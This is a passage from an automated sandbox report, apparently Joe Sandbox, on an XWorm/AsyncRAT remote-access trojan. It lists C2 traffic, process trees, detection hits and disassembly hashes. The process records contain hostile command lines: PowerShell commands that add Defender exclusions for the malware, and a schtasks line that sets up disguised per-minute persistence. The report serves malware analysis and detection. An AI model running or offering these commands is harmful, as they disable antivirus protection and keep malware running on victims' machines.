Jan 2, 2025 09:46:58.871582985 CET	50019	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:59.063081026 CET	50019	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:59.064342976 CET	50020	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:59.067893982 CET	7000	50019	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:59.069231033 CET	7000	50020	45.141.26.234	192.168.2.4
Jan 2, 2025 09:46:59.069292068 CET	50020	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:59.083514929 CET	50020	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:46:59.088350058 CET	7000	50020	45.141.26.234	192.168.2.4
Jan 2, 2025 09:47:00.472202063 CET	50020	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:47:00.477138042 CET	7000	50020	45.141.26.234	192.168.2.4
Jan 2, 2025 09:47:01.211802959 CET	7000	50020	45.141.26.234	192.168.2.4
Jan 2, 2025 09:47:01.211895943 CET	50020	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:47:01.255640984 CET	50020	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:47:01.259922981 CET	50021	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:47:01.260561943 CET	7000	50020	45.141.26.234	192.168.2.4
Jan 2, 2025 09:47:01.264977932 CET	7000	50021	45.141.26.234	192.168.2.4
Jan 2, 2025 09:47:01.266022921 CET	50021	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:47:02.135409117 CET	50021	7000	192.168.2.4	45.141.26.234
Jan 2, 2025 09:47:02.140279055 CET	7000	50021	45.141.26.234	192.168.2.4
Jan 2, 2025 09:47:03.395914078 CET	7000	50021	45.141.26.234	192.168.2.4
Jan 2, 2025 09:47:03.396006107 CET	50021	7000	192.168.2.4	45.141.26.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:45:02.193542957 CET	65327	53	192.168.2.4	1.1.1.1
Jan 2, 2025 09:45:02.200292110 CET	53	65327	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 09:45:02.193542957 CET	192.168.2.4	1.1.1.1	0x4f47	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 09:45:02.200292110 CET	1.1.1.1	192.168.2.4	0x4f47	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	208.95.112.1	80	7332	C:\Users\user\Desktop\XClient.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 09:45:02.212590933 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jan 2, 2025 09:45:02.665893078 CET	175	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 08:45:01 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Target ID:	0
Start time:	03:44:57
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\XClient.exe"
Imagebase:	0xe20000
File size:	42'496 bytes
MD5 hash:	3E0189C1648E7DD2D285558CB6FD7058
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2943113480.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	03:45:01
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:45:01
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:45:08
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:45:08
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:45:19
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:45:19
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x800000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:45:34
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update(32bit).exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:45:34
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:45:54
Start date:	02/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Java Update(32bit)" /tr "C:\ProgramData\Java Update(32bit).exe"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:45:54
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:45:54
Start date:	02/01/2025
Path:	C:\ProgramData\Java Update(32bit).exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Java Update(32bit).exe"
Imagebase:	0x690000
File size:	42'496 bytes
MD5 hash:	3E0189C1648E7DD2D285558CB6FD7058
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\ProgramData\Java Update(32bit).exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Java Update(32bit).exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\Java Update(32bit).exe, Author: Joe Security Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\ProgramData\Java Update(32bit).exe, Author: Sekoia.io Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Java Update(32bit).exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:46:01
Start date:	02/01/2025
Path:	C:\ProgramData\Java Update(32bit).exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Java Update(32bit).exe"
Imagebase:	0x8f0000
File size:	42'496 bytes
MD5 hash:	3E0189C1648E7DD2D285558CB6FD7058
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:46:06
Start date:	02/01/2025
Path:	C:\ProgramData\Java Update(32bit).exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Java Update(32bit).exe"
Imagebase:	0xa0000
File size:	42'496 bytes
MD5 hash:	3E0189C1648E7DD2D285558CB6FD7058
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:46:14
Start date:	02/01/2025
Path:	C:\ProgramData\Java Update(32bit).exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Java Update(32bit).exe"
Imagebase:	0xdb0000
File size:	42'496 bytes
MD5 hash:	3E0189C1648E7DD2D285558CB6FD7058
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:47:00
Start date:	02/01/2025
Path:	C:\ProgramData\Java Update(32bit).exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Java Update(32bit).exe"
Imagebase:	0xec0000
File size:	42'496 bytes
MD5 hash:	3E0189C1648E7DD2D285558CB6FD7058
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.2%
Total number of Nodes:	58
Total number of Limit Nodes:	3

Executed Functions

Function 00007FFD9B87155F Relevance: 1.8, Strings: 1, Instructions: 565
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P_H, xrefs: 00007FFD9B871A6F

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID:
String ID: P_H
API String ID: 0-1734449649
Opcode ID: 724fbb643f63266fb084986604301941f67df1c13218041f7acf19680bc55397
Instruction ID: 4e0fabd60ac9d359433ca9826ea5c70b3077b643badb8748c9e89feadf72e6dc
Opcode Fuzzy Hash: 724fbb643f63266fb084986604301941f67df1c13218041f7acf19680bc55397
Instruction Fuzzy Hash: 7002D661B29A494FE798FB6C48B6A79B7D2FF9C314F4401B9E05EC32D6DE28A8014741

Function 00007FFD9B877648 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FFD9B8776E0

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 765cf7288fddea02412dca7abd0e1d5dddd69ab36913057b67f49ce6a6a04d43
Instruction ID: 72997517f0af33f7196ffc67379ceb391f3cbc04a0780b323c2b1200f748c7b3
Opcode Fuzzy Hash: 765cf7288fddea02412dca7abd0e1d5dddd69ab36913057b67f49ce6a6a04d43
Instruction Fuzzy Hash: 5D31E33190861C8FDB58DF9CC8867FD7BE0EF69321F04416AD489D7282DB74A846CB91

Function 00007FFD9B875CBC Relevance: .4, Instructions: 441
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3475097e520c0221600124585ff094dcfae61a8887278d2fc038a090fb45530
Instruction ID: 66c25cf13d30eb47c60d1b1d166d67439d6b4849d8f492beeacc6fc61af1dbab
Opcode Fuzzy Hash: c3475097e520c0221600124585ff094dcfae61a8887278d2fc038a090fb45530
Instruction Fuzzy Hash: 82E19370A18A4D8FEBA8DF28C895BE937D1FF58314F40426EE81DC7295DF34A9458B81

Function 00007FFD9B876A6C Relevance: .4, Instructions: 424
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d7ba63f0ad5b3ba542d8e3a077bb280a4112b8b72290429de16b091d812c77
Instruction ID: 08344d1856f5d9168dcb406ff0155a428c033e33d56d4daa98489af8077492d5
Opcode Fuzzy Hash: 09d7ba63f0ad5b3ba542d8e3a077bb280a4112b8b72290429de16b091d812c77
Instruction Fuzzy Hash: EFD1A570A18A4D8FEBA8DF68C8957F977D1FB58310F14422ED80DC7295DF74A9448781

Function 00007FFD9B871F41 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5430c21fa679a2236ee268d3d0d9fce40ccca4d3993f0227c1f4d71e9bdecff6
Instruction ID: d60c0db5721411253c8a6107f5fc45258c5ca940d21d6f8916f91129882885df
Opcode Fuzzy Hash: 5430c21fa679a2236ee268d3d0d9fce40ccca4d3993f0227c1f4d71e9bdecff6
Instruction Fuzzy Hash: DBC1F971B2E90E4FEB98EB6884B567977D2FF9D304F050179E05DC32E6DE28A8029741

Function 00007FFD9B871CA1 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed6a0fdb77441a5fe39a412e4fd11493d009d9bf448d58f348ed7a310dfe3d1
Instruction ID: d3ea1de0f017be32c3431d73ddae39b0a8e5b2adeb2f177e27c53cba37eb45ca
Opcode Fuzzy Hash: 9ed6a0fdb77441a5fe39a412e4fd11493d009d9bf448d58f348ed7a310dfe3d1
Instruction Fuzzy Hash: 5E510120B1E6C90FD796ABB848B56756FE5DF8B219B0800FBE0D9C75EBDD185806C342

Function 00007FFD9B879168 Relevance: 1.7, APIs: 1, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c1316a489f78454a6584d6ce01d2eaf27945af86fb5d3307cde6e269fdd285b
Instruction ID: de4103f86a368e6cd42328fc75c5a48c8f82d4556128359dc18a7b99ea2baa37
Opcode Fuzzy Hash: 5c1316a489f78454a6584d6ce01d2eaf27945af86fb5d3307cde6e269fdd285b
Instruction Fuzzy Hash: 75719C71A0E7865FE729EBA888696A87FE0FF15304F0801BFD0DD871D3DE2465468341

Function 00007FFD9B8797B8 Relevance: 1.7, APIs: 1, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9B879881

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: f465fdde5c85b7262ef7169ebbe37b5768dff335e847405f05e1a9bafb38bab6
Instruction ID: c2fd77b5835aaacd9a602ac99d809fdce599254e9e777d716b7be7d8cbb23951
Opcode Fuzzy Hash: f465fdde5c85b7262ef7169ebbe37b5768dff335e847405f05e1a9bafb38bab6
Instruction Fuzzy Hash: 0241F731A0CA4C9FEB58DF6C98467F9BBE0EB59321F00427ED05DC3292DB7564528781

Function 00007FFD9B879248 Relevance: 1.7, APIs: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD9B879342

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 556960a33b873be70a66228b70f74c87b7964b8fd64777da12055d3856f03c4e
Instruction ID: 69f6d81987951a8fd6b5ea864a96f54ded1c994292d558ff32c415c48183ec7f
Opcode Fuzzy Hash: 556960a33b873be70a66228b70f74c87b7964b8fd64777da12055d3856f03c4e
Instruction Fuzzy Hash: 3841467190D7898FDB29EB9C98596F97BE0EF55300F08016FE0DAD3193DA24A842C741

Function 00007FFD9B879278 Relevance: 1.6, APIs: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD9B879342

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 761c84055b886feb462a0b9b87c6c6442a8920cd8ba4535a5ae24a6b0a54b3cb
Instruction ID: 0ec6b18886a70ee15bb66799c700f571139394c61f598bd8711ad71f75a648dd
Opcode Fuzzy Hash: 761c84055b886feb462a0b9b87c6c6442a8920cd8ba4535a5ae24a6b0a54b3cb
Instruction Fuzzy Hash: E641157190CB488FDB28DB9C9859AF97BE0FF59310F14012EE0DAD3292DB306842C781

Function 00007FFD9B879288 Relevance: 1.6, APIs: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD9B879342

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 619db948700d41a1d5f8f45d1528994faec5ee86aa28fd08a262a344be5250d2
Instruction ID: da6b3d5c2f5e56d6f5a4609a8091d44eb77204d84f8b855a02f87baeec902165
Opcode Fuzzy Hash: 619db948700d41a1d5f8f45d1528994faec5ee86aa28fd08a262a344be5250d2
Instruction Fuzzy Hash: A631E27190CA588FDB28DB9CD855AE97BE0FF69311F14012EE09AD3292DB706842CB81

Function 00007FFD9B8787E2 Relevance: 1.6, APIs: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD9B879342

Memory Dump Source

Source File: 00000000.00000002.2981713767.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_XClient.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 973747ca4a1ebdc641a0a11c55466d2365bf9141483a103e6dd38875aeddde47
Instruction ID: b7ed98ae53a07f1bf61c2b17a56b3ab8f790a797bb94ea7064ddd3baf34dccc0
Opcode Fuzzy Hash: 973747ca4a1ebdc641a0a11c55466d2365bf9141483a103e6dd38875aeddde47
Instruction Fuzzy Hash: BC31C231908A188FDB2CDF9CD849BF97BE0EF59311F14412EE09AD3691DB746842CB91

Analysis Process: powershell.exePID: 7456, Parent PID: 7332COMMON

Executed Functions

Function 00007FFD9B966605 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1783171427.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98ba2b2d23e550da151fd527d5cc8351c952eef0fba5a49bd466682385a46785
Instruction ID: d3221690b858aebda48ef309aec6f48a8894fc11a6c6892efc649425e0a4a197
Opcode Fuzzy Hash: 98ba2b2d23e550da151fd527d5cc8351c952eef0fba5a49bd466682385a46785
Instruction Fuzzy Hash: 06D13832A2FB8E9FEBA59B6858645F57BD0EF56310F0901FED05DCB0E3D918A9058341

Function 00007FFD9B899F55 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1782832447.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d965ffb75181e0cedab98da1f65da5737acd8389ef742fe060574f8d68b52406
Instruction ID: 2d4ab80192dfc425e39e3fd6f9a03ef7a5135e3a045a005f973ece20f9d56c35
Opcode Fuzzy Hash: d965ffb75181e0cedab98da1f65da5737acd8389ef742fe060574f8d68b52406
Instruction Fuzzy Hash: 45518F67A0BA9D5BEB125B6DEC790D87FA0EF11729B0903F3C4D88B0A3FC1525574681

Function 00007FFD9B899738 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1782832447.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f735949dc45c0960bf6f4e016e68895fdf8e5a5c430524862559b37cb6df2128
Instruction ID: db0dfff82a4e9f2ad4f3e1c0dd3cabea42b239a4a0ce3f83c1737a16fe325083
Opcode Fuzzy Hash: f735949dc45c0960bf6f4e016e68895fdf8e5a5c430524862559b37cb6df2128
Instruction Fuzzy Hash: C0414D71A0DB489FDF589F5C985A6A87BE0FB99710F50416FE449C3292CF20B846C7C2

Function 00007FFD9B77E29F Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1782514743.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b77d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17a40666ebec59b5ac542a8d156ef70c0c177e077a3a21d69002d250530b45e
Instruction ID: e12e088f9d91ae445ff0d3bd2432a6b3539c63ddde57e80ed71ea1fde865c6ee
Opcode Fuzzy Hash: e17a40666ebec59b5ac542a8d156ef70c0c177e077a3a21d69002d250530b45e
Instruction Fuzzy Hash: 5D414A7140EBC44FE7668B3898559523FF4EF57320B1602EFD088CB1B3D665A946C792

Function 00007FFD9B89A47C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1782832447.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13d49c347917cb1b6b83a3fa2904e816b6e70b838b466424d2ea7dcbb49f0936
Instruction ID: 915203c03446eadb23674b93f7ee375e50189b2fb2716a107cd4a319b449d605
Opcode Fuzzy Hash: 13d49c347917cb1b6b83a3fa2904e816b6e70b838b466424d2ea7dcbb49f0936
Instruction Fuzzy Hash: DE21283090CB4C8FDB59DBAC984A7E97FE0EB9A320F04416FD048C3162DA749416CB92

Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1782832447.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1783171427.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b556082a0c4808975d4fc78b5b65b14ce8d9cf3c3fa3614dbdfb4ff18b782d2b
Instruction ID: 8d7637e51b886dc4bfd8f4962ece14714b6a7df1f81a4f6eb19f5047b2e218ce
Opcode Fuzzy Hash: b556082a0c4808975d4fc78b5b65b14ce8d9cf3c3fa3614dbdfb4ff18b782d2b
Instruction Fuzzy Hash: 9DF0BE32B0E5498FD768EB9CE4519E873E0EF6532071640BAE06DC72B3CA25EC41C741

Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

